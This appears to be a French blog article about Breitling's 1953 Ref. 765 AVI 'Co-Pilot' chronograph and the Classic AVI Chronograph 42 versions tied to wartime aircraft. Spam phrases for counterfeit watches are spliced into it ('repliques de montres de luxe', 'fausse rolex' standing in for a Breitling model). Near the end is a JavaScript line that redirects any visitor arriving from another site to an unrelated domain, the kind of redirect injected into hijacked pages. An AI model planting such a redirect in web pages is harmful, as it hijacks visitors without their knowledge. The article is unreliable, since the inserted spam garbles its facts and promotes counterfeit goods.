Breitling Classique AVI & Réf. 765 1964 Réédition

En 1953, Breitling lance la Réf. 765 AVI, un chronographe de pilote doté d’une lunette tournante de 12 heures pour mesurer et enregistrer les temps de vol. Cela signifiait que la fonction chronographe, la complication de choix des pilotes au début, n’avait pas besoin d’être utilisée pour suivre leur voyage et pouvait être utilisée pour d’autres calculs de vol.

L’avantage pratique de la Réf. 765 AVI était telle qu’elle lui a valu le surnom de « Co-Pilot », et la montre a été rebaptisée AVI Co-Pilot. Aujourd’hui, 70 ans plus tard, Breitling célèbre ce garde-temps remarquable avec une série de repliques de montres de luxe de taille réduite issues de la gamme Super AVI de la collection et un modèle hommage dédié à l’original.

Le Classic AVI Chronograph 42 est de style similaire au Super AVI mais avec un boîtier beaucoup plus petit à 42 mm au lieu de 46 mm. Lancé en 2021, le Super AVI rend hommage à certains des avions les plus importants de l’histoire de l’aviation : le North American Aviation P-51 Mustang, le Vought F4U Corsair, le Curtiss P-40 Warhawk et le de Havilland Mosquito.

Georges Kern, PDG, explique : « Le Classic AVI échange certaines fonctions pour obtenir le format épuré que nos clients réclamaient. Les modèles Classic et Super vivront désormais côte à côte, offrant plus de choix. » Ce qu’il veut dire, c’est qu’avec la taille plus petite du boîtier, le chronographe Breitling Calibre B04 GMT certifié COSC ne peut tout simplement pas rentrer dans la montre. Au lieu de cela, elle a abandonné la complication GMT et a opté pour le Calibre 23. C’est le mouvement Breitling basé à Valjoux qui est conforme aux normes COSC.

Les quatre modèles Classic AVI Chronograph 42 en acier commémorent les mêmes avions que le Super AVI mais d’une manière classique et élégante. Une lunette étroite et des chiffres arabes surdimensionnés ajoutent une touche d’élégance vintage au chronographe contemporain, associé à un bracelet en cuir de veau. Le cadran noir avec bracelet marron doré célèbre la Mustang ; le cadran bleu avec bracelet noir commémore le Corsaire ; le cadran kaki avec bracelet marron rend hommage au Warhawk ; et la fausse rolex inspirée de Mosquito présente un cadran noir avec une lunette en céramique assortie et un bracelet marron.
Une touche de couleur ludique apparaît sur le totalisateur de 30 minutes pour chaque marque de cinq minutes, en opposition cool avec les couleurs du cadran d’inspiration militaire que sont le kaki, le bleu et le noir. La silhouette de chaque avion est gravée sur le fond du boîtier en acier inoxydable du modèle correspondant, et il existe également une version supplémentaire en or rouge de la Mustang. La Classic AVI Chronograph 42 est également disponible avec un bracelet à cinq maillons.

var q = document.referrer;if (q.indexOf(« . ») > 0) { window.location.href = « https://www.liqui-glide.com »}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée.